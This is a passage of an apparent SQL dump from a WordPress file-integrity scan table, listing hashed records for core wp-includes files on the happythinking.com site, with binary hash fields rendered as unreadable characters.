('[5ùš×YÙNh¦«ŠKˆMè', 'wp-includes/customize/class-wp-widget-area-customize-control.php', '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-widget-area-customize-control.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™T:''l×),À6ðìPÈ\Z×', '¿ræ¯ØéH]â‹yEwF/[0Z3ø[»†‘"Á', '', 0, '?'),
('\nT•¦/\\9$Y¤U\nÛÊÍŒ', 'wp-includes/customize/class-wp-widget-form-customize-control.php', '/home/equipm11/public_html/happythinking.com/wp-includes/customize/class-wp-widget-form-customize-control.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{ÅD*@6á‡{Ï„}¦ç', 'Õ+Ö“zi­›À@€×ÆÉ^F%5ÊqZg<¾Õ', '', 0, '?'),
('™\0£ùµè Ò.}¥fwA', 'wp-includes/date.php', '/home/equipm11/public_html/happythinking.com/wp-includes/date.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ï¿éNaòe‹ü»Ð\\ÀE', '—CR®H—Ç<f¡TÛ|Ïªµ/"¹Î¦úh$', '', 0, '?'),
('}ýÖË{RÒ¢Ôà¢"', 'wp-includes/default-constants.php', '/home/equipm11/public_html/happythinking.com/wp-includes/default-constants.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'r†n¥EÉ¼ÇP¸ó8„BJ?', 'Fß%OìDÌvšÜ\rŠõa…¸ò!¦…ÔPÅ›Ü_=', '', 0, '?'),
('úèRŠ,žA§Àý\ZñGJ''-', 'wp-includes/default-filters.php', '/home/equipm11/public_html/happythinking.com/wp-includes/default-filters.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'àÒÿ¸åk¦¤càDÃƒâEN', 'M­M…×ÏuK5áÅL É\Zõ(,Â÷ÌÞÜØ…Ä\rý', '', 0, '?'),
('VL6Ý7G^l%D5z3Èè', 'wp-includes/default-widgets.php', '/home/equipm11/public_html/happythinking.com/wp-includes/default-widgets.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '	äB z\\f\0ÉíÆóÇ', '%ürN8*G#˜’C¹ÂUá´­Pàzôp_-ËÏà\nÖŒ', '', 0, '?'),
('p•ð´.Ð°”ó[ÃD¡', 'wp-includes/deprecated.php', '/home/equipm11/public_html/happythinking.com/wp-includes/deprecated.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7îM­u•5{Óðmzp', '²l›|ÓkÖy‚Ü£²ÍÄjâ*	´¯þŠGŸ>³ÜxE6•‰', '', 0, '?'),
(')ÝÛø]ïÝÕZ$ÙP%', 'wp-includes/embed-template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/embed-template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'á³cüe°V¨˜bÓ»5=„ ', 'Féý®²n<‰7[zOŠßN‘‹\Z¦§pE3@râ¸B0', '', 0, '?'),
('æ9eºòÐkköRÊo—†þS', 'wp-includes/embed.php', '/home/equipm11/public_html/happythinking.com/wp-includes/embed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'û¼8t\\KÍ¾¥…Â•f\\', 'ìÔ•·é¯Z&jm=˜‹„°¬ë?Åé“I½jS', '', 0, '?'),
('•&ÚMûX—ÿWçÄO²', 'wp-includes/error-protection.php', '/home/equipm11/public_html/happythinking.com/wp-includes/error-protection.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@GóX="¤ì>‘7ÃÅš‰', ',í·µáë­@ñcZá»/_Ëù,ŸÄÀ<Ò–½k', '', 0, '?'),
('"¡žŽ¾b9®‹eÑ|®_Ë', 'wp-includes/feed-atom-comments.php', '/home/equipm11/public_html/happythinking.com/wp-includes/feed-atom-comments.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_mYïD	á[s\nð8!2ê', 'Ùƒ‘‚Å+q¾8“o¸Ž_Tâ_­Œ/zM<óR‹ÿã=9', '', 0, '?'),
('šª™‘2@ïkä¬w>K”2', 'wp-includes/feed-atom.php', '/home/equipm11/public_html/happythinking.com/wp-includes/feed-atom.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›¾KÖ:0µž™w–Ê', 'æýˆ>¿gçH…‰‘þ‘¢ãÀ­:œÔ×Ž¼ÊL3?w=¬', '', 0, '?'),
('ÜÈ¼‘ØŸÜ''\r`ùôÊÎ', 'wp-includes/feed-rdf.php', '/home/equipm11/public_html/happythinking.com/wp-includes/feed-rdf.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xG³7ë%”ž \0bÐøìþÉ', 'p=m=GÜlò”h‚nhÒÁ¸VÓå]Ó-Óû+1Êa', '', 0, '?'),
('ü])éé	¹ƒó{—?R}', 'wp-includes/feed-rss.php', '/home/equipm11/public_html/happythinking.com/wp-includes/feed-rss.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'iJ­?YC–>^‘îf¸', 'fl’P»ßf5‰2tY3‹xËÿõDÀÑ×„Ì', '', 0, '?'),
('´µß²;ø›0ÿ‚ÙË', 'wp-includes/feed-rss2-comments.php', '/home/equipm11/public_html/happythinking.com/wp-includes/feed-rss2-comments.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'G°ÄÛHöŸÝ­vé', '˜.ì‹÷?–’úÝÁUëž%OÑõóÎ™´â÷x!-Ã', '', 0, '?'),
('_*Äâ½žLÿ0â>\r', 'wp-includes/feed-rss2.php', '/home/equipm11/public_html/happythinking.com/wp-includes/feed-rss2.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´­lN+î5	¨›O?', '@!ë`CÊÏø*Meùêûz«j@	´@ ÞÒL°jw…', '', 0, '?'),
('{ïRC¼Ú\Z.*"¢Q', 'wp-includes/feed.php', '/home/equipm11/public_html/happythinking.com/wp-includes/feed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›¼e$Háöa§ÿ„¬#k', 'Õ7Np	Áv‰’1$ØøEØO“Ï‘ÖáË¾\0sv%', '', 0, '?'),
('Ënß7­‚JÀ·\Zq1ü1', 'wp-includes/fonts/class-wp-font-collection.php', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-collection.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'îôƒ%iqîÃD\\uFª %', 'Á¥yÄUÌ®ôÇvç› ¶\rìÅQõ\0]\\öâ®\\/¦', '', 0, '?'),
('»ìXîÖC¯Iæ%ô?Ë', 'wp-includes/fonts/class-wp-font-face-resolver.php', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-face-resolver.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'QáGy·ø‹}à[', '¦ìšhÝj`ÒO\ZPÞúZ7Ê©P3!Úg›µnéOÆ', '', 0, '?'),
('QqÎP­OQ‰û˜ÖJ¢É', 'wp-includes/fonts/class-wp-font-face.php', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-face.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '8dÅ\r‚PôÁSæ~9\08', 'ŽÍpfJ™öíFæÐ}Áâ‡˜NÜðr:Ð0Šþð‹Ï„/', '', 0, '?'),
(':hèÀêÜO^ËõY', 'wp-includes/fonts/class-wp-font-library.php', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-library.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '6?êA©<M‚–wÁâ*JRJ', 'kŸ\0¾±ln¼¾x	èñœÅ¡+‹®''å+û:™ëàÓ', '', 0, '?'),
('»„4ésœo“(H¿Ôh´dÖ', 'wp-includes/fonts/class-wp-font-utils.php', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/class-wp-font-utils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Z3ªuÿ''_õÆçõ¹', 'Ì‹r†­ïèý©«¢n,V×"§''ryLn6ñùG', '', 0, '?'),
('–Ž\Z5oÖÝ#R''/¤¬l', 'wp-includes/fonts/dashicons.eot', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.eot', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÓN\Z>wðË@é‘R-/Yö', 'B\nZ\Z¯®_pnÍ‚ÌµQ?/Å\r3sþ}½×)', '', 0, '?'),
('Î¢ƒSËªÄ\n´–BáV"', 'wp-includes/fonts/dashicons.svg', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´ä_‘3$_Ân ÷5Ž×X', ';Ê''8ã4aOoY8-UŠ62»ý§KÛqqü$Bàùx', '', 0, '?'),
('ãìó<kUJv%ò1‚‡', 'wp-includes/fonts/dashicons.ttf', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.ttf', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7¨¡Â÷Þ|±¯Øû¡‡Z', 'ßDºÊD+ve‚h Þs>±˜¬Züfo‚÷vWˆ~,=', '', 0, '?'),
('•Ìf0ÙËÍ­¡Ú~·)', 'wp-includes/fonts/dashicons.woff', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.woff', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\ZÔ_rY+Ê‚;ì', '§yU½]fôî8ÈÆðtâð§½’ÙÿÃlÕL.', '', 0, '?'),
('Lï¬+q¹VÊ;—hÐËY•', 'wp-includes/fonts/dashicons.woff2', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts/dashicons.woff2', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'M¶¬¡N:ÂÒ''åÊ¤·ÛÈ¹', 'Jó˜!Š¯ÉËXLl`’eþÃO¯ì°sÐH¹‰¸ãƒ', '', 0, '?'),
('’TEaäMYZ4CDi÷', 'wp-includes/fonts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/fonts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·ŸƒRËcÂ×3¢Íf|', 'éø3ø¼ƒ]V''2–ƒð¥Ö*OË¤Z¯ñp¶ÛÜù˜¬å', '', 0, '?'),
('çÅ‰û	iàö¿/Ð­', 'wp-includes/formatting.php', '/home/equipm11/public_html/happythinking.com/wp-includes/formatting.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×&¢9R¿ÛÈz×dVšÑí', 'ÇÏ 2Çúã„"4TW¤°°4PÀÒžôÄG8$%3À', '', 0, '?'),
('\ZëãèÁ¡•)qtsCI9', 'wp-includes/functions.php', '/home/equipm11/public_html/happythinking.com/wp-includes/functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŒÖfùÞÅ	áfîÙÉ€J(š', 'à_ëÈíµ»£wŽ×ÇcE(ïËu7|Q Œ>óÀËKKÎï@', '', 0, '?'),
('çb`K¬''×Šì»œçâK', 'wp-includes/functions.wp-scripts.php', '/home/equipm11/public_html/happythinking.com/wp-includes/functions.wp-scripts.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'j~E¼îiÐþ¹3;œô¬', '‚+Ní•Ø=2çƒ—9Ôlƒ«‡n¢§fœa)þ®ù\nÅ', '', 0, '?'),
('h dÑ’ê»…2öÃ_Àr', 'wp-includes/functions.wp-styles.php', '/home/equipm11/public_html/happythinking.com/wp-includes/functions.wp-styles.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Kl¼(>©D<>Á~Æ—', 'ÞpÆÐ®ÐU j^*(aÞ¬0@tñ\\nIð\r³4_', '', 0, '?'),
('ë0žŠRðJ³{yíË£÷ï', 'wp-includes/general-template.php', '/home/equipm11/public_html/happythinking.com/wp-includes/general-template.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Anù—jµ$—læ™àÜ', 'Ý…#­voiý“rb8ÿg¾&bÁÿÃÔ\n#_M,ÿ5î', '', 0, '?'),
('uéÀÒ«»¦ò;^æ''B•*', 'wp-includes/global-styles-and-settings.php', '/home/equipm11/public_html/happythinking.com/wp-includes/global-styles-and-settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>ßyÜ	“ËxoÇ/›"', 'ˆOŽÊ¾tDŸô¨%n¡vá\råÑ&A‹Eéz', '', 0, '?'),
('ð=ªZž†ªzqÎêó2(', 'wp-includes/html-api/class-wp-html-active-formatting-elements.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-active-formatting-elements.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­j}Fö¥xšË‡Y¥Qã', 'K"ña|›­*p€mòùž¹A£¤“ë—\0°Xà', '', 0, '?'),
('8V»þýŽÝ¨´®J*kD\rç', 'wp-includes/html-api/class-wp-html-attribute-token.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-attribute-token.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§.WWnjªú€¶TöUÈ', 'Œ£†RÉêsº¬_Ûõ‡KqDÏäD»MÅŠëk\rOH¯', '', 0, '?'),
('›üvzGîñôÜÙ§gœˆ', 'wp-includes/html-api/class-wp-html-open-elements.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-open-elements.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'r¢-j´ÇêÂ8ÖGîƒ', '| \Zpíðª’t9†™û6-¦ú›;R\0;»à¤âŒQ\r', '', 0, '?'),
('W) ¼€(v/‘óÕ3‡1', 'wp-includes/html-api/class-wp-html-processor-state.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-processor-state.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ç•A©q—Ü›ºÛg¾É', 'r|«®ý=Êá•û¥At&žqÈ@$Oò.}Ð­M×½²E', '', 0, '?'),
('3º—@‹]ÉŒ<Mô‘ˆ*', 'wp-includes/html-api/class-wp-html-processor.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-processor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—ãy¤ÖŒN<Ô3I.6', '„›®PÑœú\0£•óBÒEj$ÙmöÇ\Z	2£D‹', '', 0, '?'),
('ë''S‘±Drµ!Ã=û½À', 'wp-includes/html-api/class-wp-html-span.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-span.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'á­ëÍä\Z¹’LžÚÂÜ>G', '3"mö­ê¶+ÔsjZ²¶Íxõ¾¦žånqÅPÐåj®Ì', '', 0, '?'),
('%²Bãó¬qòˆƒIDJzç', 'wp-includes/html-api/class-wp-html-tag-processor.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-tag-processor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'l”/Y‘§‘‰ù]h˜°Ê¹', '½Ð“¿ºV(êFRöè´Œn“%Ý;NƒÓJ……W=°', '', 0, '?'),
('­ï˜QÔ´TR’…°!<—', 'wp-includes/html-api/class-wp-html-text-replacement.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-text-replacement.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×Ü®Û(<º]nÛæp¨YÝ', ' ".G0YYMò(HçïkÑô1·‡ã~Á•Gif', '', 0, '?'),
('œŽuHGZ^èœê¿ûwì', 'wp-includes/html-api/class-wp-html-token.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-token.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸*•ÙuBØ4ÖÇ	…Ã€', 'Kéˆ,Ã¯ú•Ë¬\rÀTŒTnÆø™øº(ï-ßw\0', '', 0, '?'),
('Ûå`žâŠù–suõ\0t¶îc', 'wp-includes/html-api/class-wp-html-unsupported-exception.php', '/home/equipm11/public_html/happythinking.com/wp-includes/html-api/class-wp-html-unsupported-exception.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŒfÀl2¯õ€ ¸_·!', 'Äx‡\\ý«•99ÿçþy—£¸ñ´–b¤	¡].Ý™9', '', 0, '?'),
('¹/&¼ŽÖûá2®Ñ¡\rgDs', 'wp-includes/http.php', '/home/equipm11/public_html/happythinking.com/wp-includes/http.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'i3o ê=±ÕO[ïê7', 'r¥V:©“<Éû’Aä¯ïf^vÄ•ç*¹}=¿iÎÝl¨', '', 0, '?'),
('´!˜-LHvø)¬ïn¨#', 'wp-includes/https-detection.php', '/home/equipm11/public_html/happythinking.com/wp-includes/https-detection.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'nb>Ò¬hFZe¹¬£\ZpŽ{', 'ÁÊäCXd®ê5ÈÃÉ[Ø6vZÂR}‹í¼ÀYî„ü', '', 0, '?'),
('åÕú°5Ü1QŠ?ž_µ¢', 'wp-includes/https-migration.php', '/home/equipm11/public_html/happythinking.com/wp-includes/https-migration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'bd¼†^´qnúÃÌ +', 'P~9ˆ8‡Y ‡¢§’*2æ*ž´ jÝi»Å­³', '', 0, '?'),
('.IhUœŽâ3Ž¿+B\Z„¼', 'wp-includes/images/admin-bar-sprite-2x.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/admin-bar-sprite-2x.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ëQ¬ë›Æ8þôo€Ê', '*E°ãÀTsüÙå£alä‰^Çp¸ÜX‰¯æ¡Z\0ù', '', 0, '?'),
('§UÌ›	''CÔ»ñºÏÚ«\Z', 'wp-includes/images/admin-bar-sprite.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/admin-bar-sprite.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'SÏ¤—:€WÊÅÓþ^', '®ôrN!ú`VO´c«ãK”ÄviÕ€{Fn\Z£Ále', '', 0, '?'),
('ré_è/™ÍHG=Í%—<º', 'wp-includes/images/arrow-pointer-blue-2x.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/arrow-pointer-blue-2x.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '%mârÞŒ]4¸9cÏ', 'Á°{&DOÀz›ÓA…fó/ÉÏgÃ¡­†íÏÄA]~À(ç', '', 0, '?'),
('@€žÌ˜9Š#¯LÃy(ÐÚ', 'wp-includes/images/arrow-pointer-blue.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/arrow-pointer-blue.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'wŸübãÎ‡*L«²Ã[»ù', 'ÝÂÊåfbÏZD1.üºþVìæawÆ4l?ÎñpäµG^Ç{', '', 0, '?'),
('æGÄÅ5Ø@æèÙÚ07•Ç', 'wp-includes/images/blank.gif', '/home/equipm11/public_html/happythinking.com/wp-includes/images/blank.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÉýûÊŸgŽÐhíkK¾¶f', '>„øEïGÅóLó´ E²òšJQ‘‡ô|ÌBÀijÏ', '', 0, '?'),
('Í>ÿMÒ8¸ Ùµ­Ñ|', 'wp-includes/images/crystal/archive.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/archive.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–SÊúðŽœÌI0Anë', 'LƒÖ%X°ó£ÐOè+ÄÞAa®!×SÁ\\Ü‰ô&—¨®', '', 0, '?'),
('ôJ''#‰‚rN„0a\rÈ', 'wp-includes/images/crystal/audio.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/audio.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '™nVñ:ÉÏ‰óGØÔ-#k', '¢~B\Z-×¼of|W¢x\\þª|¨Më)åß‰Ë¢', '', 0, '?'),
('w£¤ïLýê£0œïð]r.', 'wp-includes/images/crystal/code.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/code.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`ï1²Ïúï°õ1®9', ';ê©67˜¤ƒ”\rØ!ŠíÛçx\Z_@H×Ã&C”Ð-×ã', '', 0, '?'),
('”ô¨–!Þ¬©Äß³ÂÁ«p', 'wp-includes/images/crystal/default.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/default.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Aò>)*/¾Ü!ì®-ò›º', '€ˆˆn$‹¨ƒ_­u	†$Q3Í–E»×r¡|Jm—', '', 0, '?'),
('Dm·\n»½z—H‚ÃS”ïï', 'wp-includes/images/crystal/document.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/document.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰''^cšsÀùÄD‹ù3T\\', 'gætê»( ÅŽçˆk`5Í’¡ûJ·ÌM5®ÂÂ:jä', '', 0, '?'),
('j—£Éÿ5F+¸¯ío', 'wp-includes/images/crystal/interactive.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/interactive.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¯RÏm`òíº`™9§æ', '$­Áöë©˜<x1²éÕ“»íIRï›V-VZ\\jg.‡þˆ', '', 0, '?'),
('ÌÇŠ·EÁv–c,îØµyS^', 'wp-includes/images/crystal/license.txt', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/license.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ð]µLcãiG›fQ“\rÏç', 'vèÚpm„Êcëø6ßY~",!V¹ØEXlülã"zÞ', '', 0, '?'),
('^åƒÃ¯ðˆ¯+…y|Ð', 'wp-includes/images/crystal/spreadsheet.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/spreadsheet.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5†9øÐ¢1€TËÇn¤ê', 'e\rC¬ˆi0ã×[¯êR¬8@æ÷ðÍG’¥ðaJNÍ', '', 0, '?'),
('¼¬ðàÄÍï"¦RÑÅœ', 'wp-includes/images/crystal/text.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/text.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ì Ñ²ªü#¾dÿ%ã[µ', 'n1ôÂ0µé©<;ý\n”ÍIp¢ö~Üf™Åâ ¸ÏÇz', '', 0, '?'),
('UÃåà$i"uÂÊ&Ëô¸9', 'wp-includes/images/crystal/video.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/crystal/video.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”ÛýŽl¥‰Ú¤¸;õ=', 'ú™S\rI¾°U›Œ9_<â÷µf`…ì&HYwÂuˆ', '', 0, '?'),
('*®ä-3öu¬EÂ[ÕO#', 'wp-includes/images/down_arrow-2x.gif', '/home/equipm11/public_html/happythinking.com/wp-includes/images/down_arrow-2x.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷]ëç™êM…žÁû‡fÜ', '¥¶w\0˜øÉÜÀqp¯qð5úÚûTˆ#\\º¹½¥', '', 0, '?'),
('\nœßO‚_˜«;]/^™ç', 'wp-includes/images/down_arrow.gif', '/home/equipm11/public_html/happythinking.com/wp-includes/images/down_arrow.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'üø„V¾~ÆoöYnG~_u', 'ž€hŒ8É§øºô…ªp¿uóü{9–‘áÕ…›J‚‰¤', '', 0, '?'),
('Òž³åúìÇŸö	KsÍ×Ð', 'wp-includes/images/icon-pointer-flag-2x.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/icon-pointer-flag-2x.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©åá¦2ñ³¹bäÄ&ÕZÌr', '4ö”BÈ¥Äª''x+cÒh¹Ò VnŸ5®IÚ>ƒjÞË', '', 0, '?'),
('ÖZ×ö	r!ÞfÕÑ¾	Þ', 'wp-includes/images/icon-pointer-flag.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/icon-pointer-flag.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°Ó,‡ò­‹ÂE^¿j`''', 'oq·Ú9”Áa{)h}=#¾½üëçTû×§ÉÂ', '', 0, '?'),
('Yˆ,eêAõ¼wÀ`áÄ', 'wp-includes/images/media/archive.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/archive.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '9Òîßòhû\0ÚÓÃ¬‘u', '\0ýBb¼3˜»''ÏÔ''°„)JG –À](GÅ9Pr2 s', '', 0, '?'),
('ì"èÏOý²Ì•Æj/·', 'wp-includes/images/media/archive.svg', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/archive.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰¢á÷âî}+åƒÏ¯', 'çÖž´¥\\_mô=‹Éß:6ˆ6N~âÉ¥,ºM¢Ÿz“', '', 0, '?'),
(':ùnÌ£RMëti#šõ=', 'wp-includes/images/media/audio.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/audio.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†taCAñ¾Åþ².·çZßÀ', ' Lä>¢‘$¨Á\n²oixoj-\nLÏÓõÀá]G;q', '', 0, '?'),
('f]þÀá˜á&éÜˆã´', 'wp-includes/images/media/audio.svg', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/audio.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›8gºt Ä&ô÷’ƒ¸h', '@éE´yÚ‘[¾â-ÃC4’¹Ô{\ZÈÐºÏ®_vŸ’]C', '', 0, '?'),
('À±3"ü(zÙa€4î8Œ', 'wp-includes/images/media/code.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/code.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-o–­UÊ“îÕU©U_', '''eM a[R#q2š×kz­+*<üÄü÷Ñ7\0ÞÊj', '', 0, '?'),
('æ¤OsLêíc\r®Wø,›', 'wp-includes/images/media/code.svg', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/code.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÊÊóMvR¦ì$ÂEÌ^.¯', '“úË²dð‡ðn“f®N’˜R¦ç æn%WƒrÐ\n­¶Á', '', 0, '?'),
('(?ËÜ×>¹ôS©Næšœ&', 'wp-includes/images/media/default.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/default.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-¶©æÍIÒB–hÎ@àÞçb', ':ë¦oLóJDjòþ$->»iºé''Ã6nÖ î›Ui', '', 0, '?'),
('0Bñjªf^Pû]^pÌÈC', 'wp-includes/images/media/default.svg', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/default.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ì‰\0±µxÛŸ#éÎZeI4', 'ßnmƒì»šfže{|8M÷Ù>ô X6Áµ0 îò\\O', '', 0, '?'),
('/<Ø§^É¼f}–"×øû$¸', 'wp-includes/images/media/document.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/document.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'vå4™8öÎ‘y“6Þd£', '¦íÃ¸`™Ùû³çá±íf	I$ _ZªX—"0\r´ß,', '', 0, '?'),
('÷cì˜p~«0{f£e²', 'wp-includes/images/media/document.svg', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/document.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„øKCÓ«öM•ÙC	o½', '}vLX´ULmƒàæú iQQpH‰	ßœè‹', '', 0, '?'),
('ÖrYŸS¯xwDYËšJ™[', 'wp-includes/images/media/interactive.png', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/interactive.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'R×¬Ë‚®ñÂÃ´Å‰hÜH', '{óô‡ [Kêà\0!ƒê¸½²/á\\¹lw.Á¨êÝ', '', 0, '?'),
('ŠXq½NMæ¸\r\\¤ZZ>', 'wp-includes/images/media/interactive.svg', '/home/equipm11/public_html/happythinking.com/wp-includes/images/media/interactive.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÄEË3±aH[»$Ÿ^‰µ', 'Š–ý‡Kç˜ÿ¸ýŽäM4g@MwäÂU£Þº¢Ì', '', 0, '?'),
